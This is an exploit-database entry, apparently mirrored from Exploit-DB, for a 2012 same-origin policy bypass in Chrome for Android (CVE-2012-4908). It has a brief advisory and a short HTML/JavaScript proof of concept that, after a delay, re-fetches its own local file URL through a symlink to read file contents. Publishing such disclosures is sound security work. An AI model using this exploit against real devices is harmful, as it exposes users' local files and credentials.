Lucene search
+L

Google Chrome for Android - Same-origin Policy Bypass Local Symlink

🗓️ 12 Sep 2012 00:00:00Reported by Artem ChaykinType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 25 Views

Google Chrome for Android Same-origin Policy Bypas

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2012-4908
12 Sep 201200:00
circl
cve
CVE
CVE-2012-4908
13 Sep 201220:00
cve
cvelist
Cvelist
CVE-2012-4908
13 Sep 201220:00
cvelist
debiancve
Debian CVE
CVE-2012-4908
13 Sep 201220:00
debiancve
euvd
EUVD
EUVD-2012-4833
7 Oct 202500:30
euvd
nvd
NVD
CVE-2012-4908
13 Sep 201220:55
nvd
packetstorm
Packet Storm
Chrome For Android Bypassing SOP Flaw
8 Jan 201300:00
packetstorm
prion
Prion
Design/Logic Flaw
13 Sep 201220:55
prion
redhatcve
RedhatCVE
CVE-2012-4908
22 May 202505:36
redhatcve
securityvulns
securityvulns
Chrome for Android - Bypassing SOP for Local Files By Symlinks
10 Jan 201300:00
securityvulns
Rows per page
source: https://www.securityfocus.com/bid/55523/info

Google Chrome for Android is prone to multiple vulnerabilities.

Attackers may exploit these issues to execute arbitrary code in the context of the browser, obtain potentially sensitive information, bypass the same-origin policy, and steal cookie-based authentication credentials; other attacks are also possible.

Versions prior to Chrome for Android 18.0.1025308 are vulnerable.

<body>
     <u>Wait a few seconds.</u>
     <script>
     function doitjs() {
       var xhr = new XMLHttpRequest;
       xhr.onload = function() {
         alert(xhr.responseText);
       };
       xhr.open('GET', document.URL);
       xhr.send(null);
     }
     setTimeout(doitjs, 8000);
     </script>
</body>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation